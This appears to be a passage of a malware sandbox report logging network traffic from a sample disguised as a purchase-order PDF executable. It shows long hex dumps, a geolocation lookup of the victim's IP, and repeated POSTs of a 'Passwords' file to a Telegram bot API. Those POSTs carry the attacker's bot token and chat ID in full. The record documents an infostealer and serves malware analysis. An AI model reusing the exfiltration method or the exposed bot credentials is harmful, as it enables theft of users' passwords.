                                                                                                          2024-12-17 02:29:44 UTC4944INData Raw: 59 6d a8 a4 50 d0 4e 1d 47 6f 21 a9 1d d6 2a 27 ec fc 17 0f 07 0b 30 71 2f c6 36 97 47 b4 bf f7 69 e8 32 e2 17 37 e9 6d 1d 66 e3 55 48 6c 51 8a 97 03 f8 fa e5 63 37 f6 c6 b3 0c 13 37 34 eb 2c 1c f2 4f 38 7c 8e 09 3b ad 27 15 ce 12 64 4a 9e 10 2c 2c b8 3a c3 ad f3 68 e9 15 10 44 f7 e1 2f 18 2d bc 5e 9b f7 99 d7 cc 0e a6 f9 c7 4a 12 68 10 86 4e f7 62 16 8d dd 28 fb af 5e 36 2d 4d 22 15 cd 6b 0e a6 43 a5 82 41 53 fb 6d 81 df c0 9d 5c 20 33 8e 84 06 47 f7 53 07 23 ca 24 98 d9 f3 c5 bb 6c 4c 2b 58 8c e2 48 b5 6d f2 19 1b b7 bd b7 81 72 f3 93 42 a1 53 b1 52 28 8b 0b bf ae 9a e0 18 ad 6a 2d 76 e5 01 37 8b bf 71 38 80 59 3f 11 24 1c f0 b0 b7 fa c9 ab 2d eb b1 38 2f 5f 11 b4 ce ae 7e c6 1e 3a bb bc 83 a9 16 bc e6 4a 97 a2 3e da 4a 1e 8f f5 89 44 9d a4 5e 43 8f b8
                                                                                                          Data Ascii: YmPNGo!*'0q/6Gi27mfUHlQc774,O8|;'dJ,,:hD/-^JhNb(^6-M"kCASm\ 3GS#$lL+XHmrBSR(j-v7q8Y?$-8/_~:J>JD^C
                                                                                                          2024-12-17 02:29:44 UTC4807INData Raw: 17 ec 64 ae 4b e5 25 a5 d2 16 c6 b3 32 81 a8 65 61 07 7d d2 63 f7 99 ba ea c2 49 6c a2 04 f7 c8 14 07 2a d7 9a c0 be bc 38 05 3f ee 2f 48 37 2a 62 d2 e8 77 23 69 32 20 a5 21 31 96 75 13 8a ae 81 c5 00 34 04 8f 8d 1b 53 7f 5e 77 10 07 17 1c f9 8d 0d 2d 65 73 0c 3f 65 51 df 59 b4 f6 94 b2 17 02 87 50 33 6c 00 f9 8d 4d cb 17 c9 69 ae 21 9f cc 00 e9 d9 11 b6 b1 fd 30 69 c2 67 9d d2 61 f7 ca b1 ef a2 89 fd 07 37 e0 a3 20 a9 e6 59 10 c8 b8 49 a4 65 f2 d6 5d 48 24 0c 12 5f 0b 9b 32 f9 69 ce a8 aa b2 a9 28 49 b6 60 e7 6a b8 c3 cd 24 62 f8 1c 90 bd 9e a5 b2 5f a5 9d 03 3d d5 a4 22 73 52 3c 36 95 af 57 54 52 ae a0 96 5e 48 86 91 08 65 d5 87 92 3e 7e 05 be 10 9a 8c f9 2b 93 1c b2 93 04 62 fd 55 b8 19 84 5b 33 e2 cb a6 b2 63 d2 78 4b c4 b2 1d a3 96 ea a6 cb e0 41 f6
                                                                                                          Data Ascii: dK%2ea}cIl*8?/H7*bw#i2 !1u4S^w-es?eQYP3lMi!0iga7 YIe]H$_2i(I`j$b_="sR<6WTR^He>~+bU[3cxKA
                                                                                                          2024-12-17 02:29:44 UTC1326INData Raw: 1a 36 ff eb ad 3e 64 39 91 20 9d e2 6c 8e 36 6d 77 3a ba 00 17 c6 75 63 1f 3b 6b 4d db 76 0d 42 4d 72 63 ca 59 d3 e3 24 c3 b5 bf 5a b6 67 76 54 38 59 fa 9a 92 c7 e2 84 c7 81 2e 25 02 e3 6b 8f 56 c1 b7 f5 ff 25 a2 8b c7 fd ff f2 21 08 84 4c fe ec 4d 42 cf 10 3d 37 4f a5 28 8d 85 f8 fe b4 3a 18 f3 86 b5 8c 4e 09 ea 3a e2 fb 6b 67 5a 73 82 09 37 c8 ef 3e 3e d9 06 f5 a2 ef 62 af c8 7d 77 fb 84 d2 db e5 61 c6 1a cc 1d dd c6 a0 45 84 23 bb 2f c6 71 8f c1 e3 6e bc 8d 56 9e 46 3e 64 df 9e 90 c9 0b e8 cd ba e3 16 d2 8e eb b1 81 7f d8 8e 73 46 9c f6 57 79 71 44 a0 d7 27 6a 17 f4 92 d0 b5 ff 46 b1 62 c6 c1 82 a8 b6 7b 70 95 4d 2a 82 7c 34 06 71 d3 95 fc 00 16 4a fc 5b 57 30 b2 64 ec 7e 55 45 b3 14 41 7a 37 ee c4 93 91 ae c4 76 7d 9a 1d d2 16 93 fb e2 57 ec 4a e0 5f
                                                                                                          Data Ascii: 6>d9 l6mw:uc;kMvBMrcY$ZgvT8Y.%kV%!LMB=7O(:N:kgZs7>>b}waE#/qnVF>dsFWyqD'jFb{pM*|4qJ[W0d~UEAz7v}WJ_
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: 32 79 bc c1 65 af aa 44 4a 2f d4 b4 e9 ab 49 c2 cb 65 11 af 58 b5 78 98 5d be c2 4f eb 49 b2 76 6f d1 14 7e a4 f5 88 a6 d0 7a 38 0f 39 90 d4 47 60 62 44 d2 98 df 18 cd 32 08 fd 32 35 e2 a7 04 88 aa 90 c1 28 7a 7a 97 87 9b 58 0d 08 78 10 65 03 1c a5 8d 0d 2d 60 88 1c 29 4d d1 04 6f bd f5 6a a4 1b 71 0b 4b 5c 67 13 ff 96 4b 69 09 e2 6b aa 52 38 cd 10 e3 b6 9d b6 ac f7 4a ef c4 07 12 d2 61 fd af a0 e5 a2 c7 91 97 37 cc a9 20 a9 e0 02 58 c8 b8 49 dd 0f 74 e9 2d 60 13 29 04 2b ae b3 32 89 c1 c3 f8 d8 54 b6 47 ab 14 45 f5 18 ab d3 bf 50 c7 dd 75 9c be 88 a5 c6 8f 3b 82 10 49 e7 6e b3 73 58 52 80 83 d1 83 54 2c b6 d2 ac 4c 3b 62 fe d7 6f c6 8a 21 1d 06 ee 60 10 90 97 8c a9 13 1c c2 f6 db 1c dd 5f 1a 38 ef b2 ed e2 c1 bf c8 f9 de 78 3b af 1f 81 a8 9c 38 95 fa 1f
                                                                                                          Data Ascii: 2yeDJ/IeXx]OIvo~z89G`bD225(zzXxe-`)MojqK\gKikR8Ja7 XIt-`)+2TGEPu;InsXRT,L;bo!`_8x;8
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: 5f 0b 01 80 bb d9 cc 2e 93 54 07 f8 26 1c f0 41 bb e9 c5 3a 3f b5 a0 36 3a b0 11 b4 cc bd 71 d7 10 2b b5 10 56 b2 16 cc a9 a1 97 a2 94 cc 9c 71 60 b5 89 4e ae b4 4f 4d ff ec 9c e3 64 97 2f 9d da 83 45 84 18 5e a9 7c 78 e6 5a f6 36 05 42 6e 6f 7c 33 9e db 0e 44 e9 3b f6 9b 58 63 55 db 74 08 ed a6 c9 0b 1e ca a8 0f cc 5a 7b 5b 1b f8 c8 a4 39 65 7a 95 ad f4 f4 3e 5a fe 25 04 4c c3 0c 76 52 a0 09 ad 93 68 27 16 64 1e a5 ad ba 5e 8c d3 01 30 ef 97 b6 0d c4 63 75 80 17 aa 8e 5f 82 52 ab 06 46 7e 3b 34 60 93 78 c8 09 23 57 db c7 8e 3e b5 8a 9f 3b 19 a7 cf d2 3d ca d3 2a cf 1d c3 38 ef d2 b4 5c c0 f1 59 24 33 e5 38 cc 38 cb 0c 7c 3e bd 7d 38 55 d6 29 46 ce a9 7d 24 06 0e 3a 84 0c 56 bc 8b 4c 5e 1d 7b 60 6c 4f 1b b9 76 2f 28 a7 d6 bf 5f 07 8a 8a 48 1d 05 be b4 0e
                                                                                                          Data Ascii: _.T&A:?6:q+Vq`NOMd/E^|xZ6Bno|3D;XcUtZ{[9ez>Z%LvRh'd^0cu_RF~;4`x#W>;=*8\Y$388|>}8U)F}$:VL^{`lOv/(_H
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: 58 3b b1 0d 46 88 62 69 30 3b 7d 59 aa 17 0d 44 63 70 18 9a 69 d5 e7 1e 10 b5 bf 61 b6 65 62 da 53 56 7f 81 92 b3 c8 c8 bc cc 24 2e 10 46 e3 8f 56 ca c6 be d7 dd a6 8b cd c1 01 f3 2c 12 a7 4b ef 73 61 4b db 27 39 37 66 78 2a f6 c3 f8 8c 52 5f 4b 83 98 cc 5d 1a 09 e0 37 c0 07 78 63 41 5f 55 04 35 b9 ba 38 2f db 41 da a2 ef 62 bc c0 56 36 91 c6 bd a5 e1 1f 9f 32 f6 17 f5 98 b3 4c 9f 21 c8 a1 c3 60 8b fe e4 7d cd a8 ab 9e 42 1c a4 d4 8f 91 da 07 f9 c3 ed b2 07 d8 e5 6b e2 81 75 c5 c9 d8 46 9c f6 34 71 63 42 bb f9 61 67 15 85 d6 d0 b5 fb 7f 6a 0d 46 cb 82 a2 a5 74 1a d4 60 9a 58 15 76 0e 04 c8 bd a8 01 3a 4d e0 5a 31 26 a3 63 c1 1c 56 3e ff 1e 41 a2 17 b3 ad 88 41 b9 1e 61 81 17 44 c9 26 98 e8 cf 5e f7 5b c2 49 c9 dd 28 ff 67 88 23 5d 7f f4 70 fe 7d 69 62 fb
                                                                                                          Data Ascii: X;Fbi0;}YDcpiaebSV$.FV,KsaK'97fx*R_K]7xcA_U58/AbV62L!`}BkuF4qcBagjFt`Xv:MZ1&cV>AAaD&^[I(g#]p}ib
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: 01 24 78 8d 0d 63 73 8d 0c 37 50 44 da 1c ae f7 94 81 17 71 1a 50 2c 7a 3b 27 9c 4b bf 7b e9 74 aa 22 3a 82 00 e3 bc 95 b6 b7 df c8 78 c4 02 19 d5 58 bb b5 90 ef a4 fe 45 97 37 e6 a5 28 ca ba 6d 81 b8 d7 91 d6 15 ff f0 25 0f c1 0c 12 5f 73 7c 21 ff 75 f5 e8 92 a5 a2 47 db be 71 ea 18 c1 d9 bf 50 0a 2d 6c ee a6 93 ad a7 2a 45 e8 1f 4d 8d 8c f7 73 58 55 b6 91 a7 4c 53 5e 20 bc 96 2a 54 c7 91 08 69 d5 85 92 3d 39 03 be 10 96 8e f6 55 0d 30 f1 9f 2c 1f dc 55 b2 72 f3 cd 33 e8 ae b0 bb 1d c3 50 df c0 c0 87 bb 9f 8b b9 f7 9f 40 e5 34 d7 9d f2 90 42 01 2f 94 4c 23 68 82 45 d9 61 4a 92 fd d3 1d 25 f0 00 71 bc 36 ee f4 f5 e4 d5 b6 0c 67 04 b1 bf 79 44 2b 59 87 0a 50 7f 7c bb 28 9f 39 8a d6 17 6e 23 17 73 22 45 55 7e c5 62 11 d0 8e c4 b7 5f 49 c8 8b a8 a1 2b 93 b6
                                                                                                          Data Ascii: $xcs7PDqP,z;'K{t":xXE7(m%_s|!uGqP-l*EMsXULS^ *Ti=9U0,Ur3P@4B/L#hEaJ%q6gyD+YP|(9n#s"EU~b_I+
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: 00 8d 35 8d d4 a8 52 d2 b9 e5 8c 84 67 8b 47 25 24 ae a1 f2 1c 09 d9 b7 12 2a 5e 7b 21 67 eb d8 b6 22 59 f8 84 be 9d 15 37 4b fd 17 eb 59 c6 97 47 88 b6 f7 ac 7e 62 25 0a 59 1f 9e 1e ab 47 aa c4 12 4c a8 97 9d 02 d5 7d 4e 0d 17 bb 9b 5b 5d 41 b1 10 7e 45 03 2a c8 93 78 d3 15 23 4b 38 44 b2 0f d2 f4 5e 2a 02 30 bf f2 12 c4 c8 16 62 06 52 21 c1 29 b5 5b 3a 82 90 20 25 86 32 f5 a5 d8 11 67 35 7a 87 28 50 a4 da 55 dd c7 7a 18 96 15 ab a6 de a8 bf de 4c 4d 1d 69 5e 3e 7a 53 86 76 25 01 cc c0 cd b3 00 9c 88 08 3d 12 c7 05 0b eb f5 0d 94 71 eb 84 cd cb 58 cd 9f 5d 2c 8c 77 8f c1 28 e6 49 8b 47 e3 78 f8 f0 ad 9f 7a 3f 41 09 da 81 3f 72 7e ba 0d 0b 56 88 49 ec f1 61 67 04 a2 19 06 35 59 64 c3 04 63 e9 2c 41 58 28 1c b9 3c e9 5e 23 9a a7 4a 8d 3e b3 4a fd 87 f4 8c
                                                                                                          Data Ascii: 5RgG%$*^{!g"Y7KYG~b%YGL}N[]A~E*x#K8D^*0bR!)[: %2g5z(PUzLMi^>zSv%=qX],w(IGxz?A?r~VIag5Ydc,AX(<^#J>J
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: c5 4b f3 8c a9 5a 19 18 ef 42 0a f8 78 13 5d 5f 2f 04 35 b9 bf c0 3d 82 3d 2a b3 e3 44 e2 d5 f0 4a 80 ce d3 fe f7 6d 73 0e cc 67 57 b7 b7 4c 2c 0d a4 4e ef 75 8a 9d 4c 49 de d6 52 3c 67 0c c5 99 8b 9a b9 a9 cd d4 d0 ae b4 f7 96 e7 29 a3 7f a2 04 0f e6 9c fc 51 62 6f 3c be d1 0b 63 04 82 f2 9e b5 fb 64 e2 6d c6 cb 86 a8 b6 68 0c ce 9b 39 81 13 60 17 77 e7 5d 56 ff e9 40 f1 8c 54 12 8b 50 c0 73 5d 2d f1 14 69 2c 1f 3d ce 4d 9b ae ee 37 4b 9a 1d c9 26 99 fb db 56 ec 4a 92 5e c1 53 2b e5 bd a0 55 5d 7f fe 34 fe 6c 6f 6d dd e6 74 bd 43 a3 30 38 6e 79 ac b3 66 9c d3 3f 21 e7 4a a1 91 15 c8 a1 b5 f0 e5 de c5 d7 70 25 50 e6 58 5c bc 03 8c e9 13 8e d0 4a 6b 8d 6d 7f 38 f6 32 ee 17 34 5b cf c6 dc 0b 25 72 b4 58 6b 4c df e9 6f a9 c4 58 94 96 f8 64 64 8a 9c 03 46 35
                                                                                                          Data Ascii: KZBx]_/5==*DJmsgWL,NuLIR<g)Qbo<cdmh9`w]V@TPs]-i,=M7K&VJ^S+U]4lomtC08nyf?!Jp%PX\Jkm824[%rXkLoXddF5
                                                                                                          2024-12-17 02:29:44 UTC1390INData Raw: a6 32 f3 70 e8 ef 82 e0 a3 47 d1 68 60 ed 40 e8 d9 bf 20 65 f8 6c ee b3 9e a5 b6 7a 36 96 03 27 fc e3 22 63 58 53 a5 d1 af 5d 55 37 8c a4 96 26 3a 12 91 3b 6f c6 91 83 27 0d b8 66 10 90 97 8c dd 20 1c c2 b1 4a 1c dd 5f b2 1d f1 e4 cb e2 c1 bf b1 1a f0 3e 4a c0 c0 87 db 41 9a b0 e5 6d 49 84 64 da 97 94 01 91 12 24 83 61 07 11 79 ef d9 67 57 59 eb ba 54 36 f7 32 77 b4 1e 7b fc e4 e5 b4 db 10 67 74 f5 4a 79 6c 87 54 8f 11 5f 1c 05 d5 b4 f3 56 2f b9 c2 68 30 15 14 6c 42 27 e8 f1 de 61 bf 5d d7 b2 59 4b c9 e8 4f 8c b8 e3 a0 a5 67 00 25 39 82 ff c4 af 55 3b 94 cf 94 a0 ca 9b 4c ce dc 12 17 71 27 4e 4c 79 c8 f8 8d 2f 41 50 06 08 9a 22 32 64 83 d2 1c 77 92 61 99 48 9e b7 64 8d 35 de 97 75 ab 38 ea db c3 1e 05 b5 76 f2 69 a9 16 25 2a 50 60 f6 34 8d 27 b8 70 64 4d
                                                                                                          Data Ascii: 2pGh`@ elz6'"cXS]U7&:;o'f J_>JAmId$aygWYT62w{gtJylT_V/h0lB'a]YKOg%9U;Lq'NLy/AP"2dwaHd5u8vi%*P`4'pdM


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449739188.114.97.34437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:29:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:29:49 UTC876INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:29:49 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 391358
                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E3BPvkalJN0hbbu%2BUm2TPCaEfukHDJVpZWby1BoEn9teZAoBaJo0v74NSQZ5hPo9TGt29MnFnUozPb1hawxjVDrNJJZdSyJ9Jlp%2BYn2p8kpeW9O6DknPQgCUhpBse358BP%2Fjy3B"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f337cd94f9f728c-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1956&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1374117&cwnd=157&unsent_bytes=0&cid=e99cfe2a66fd69c0&ts=464&x=0"
                                                                                                          2024-12-17 02:29:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449742149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:29:57 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1e18c888856f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:29:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 31 38 63 38 38 38 38 35 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1e18c888856fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:29:57 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:29:57 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:29:57 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 35 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13510,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402597,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449749149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:00 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1e43f72e9d46
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 34 33 66 37 32 65 39 64 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1e43f72e9d46Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:01 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:01 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13511,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402600,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449785149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:13 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1edc6a8bed6e
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-17 02:30:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 64 63 36 61 38 62 65 64 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1edc6a8bed6eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:14 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:14 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
